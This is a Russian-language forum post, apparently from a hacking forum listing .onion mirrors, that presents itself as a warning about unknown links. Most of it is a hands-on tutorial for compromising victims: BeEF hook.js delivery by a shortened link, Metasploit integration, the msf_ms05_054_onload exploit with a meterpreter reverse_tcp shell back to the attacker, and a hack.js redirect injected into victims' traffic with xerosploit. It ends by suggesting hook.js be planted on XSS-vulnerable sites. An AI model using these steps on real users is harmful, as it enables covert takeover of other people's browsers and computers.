• Форум доступен на основном домене:
    временно не доступен olymprc.biz
    olymprc.com
    И также в TOR сети по ссылке:

    olymp3z5tdjywb2piewcrqqtrtmkgexhrzpytnq2vuli5dpjdu764wyd.onion
    Если основной домен не доступен, то можете использовать зеркала:
    olymprc54rbqyfv3ddr2jwdqzvrayed7zg4d7izvm6sreha5ax6wtwyd.onion
    olymp4e74mzx74pz5tzryfr7slh3azefmu4cchg5vzoqzeqovuvj6gid.onion

Опасность перехода по неизвестным URL. Взлом устройств

  • Автор темы JOUR
  • Дата начала

JOUR

Служба безопасности с плюхами
Контент форума
Регистрация
10/9/18
Заметки
0
Сообщения
51,363
Симпатии
22,711
Репутация
35,374
#1


Поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. На примерах убедимся во всей опасности...
  • Первое что может случится при переходе по ссылке это то, что злоумышленник получит доступ к вашим аккаунтам социальных сетей.
  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.
К преибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit.
Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.

Запуск beef.

В терминале пишем
beef-xss

Переходим по ссылке http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true

  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
msf> load msgrpc


И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
./beef -x

После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузили пользователю и выполнили их. Для начала я хотел бы узнать какая ОС у моего пользователя.

И как видно на скриншоте - это windows.
Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.
А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js

Далее проделываем выше описанное. Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны)

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? ...
 
Сверху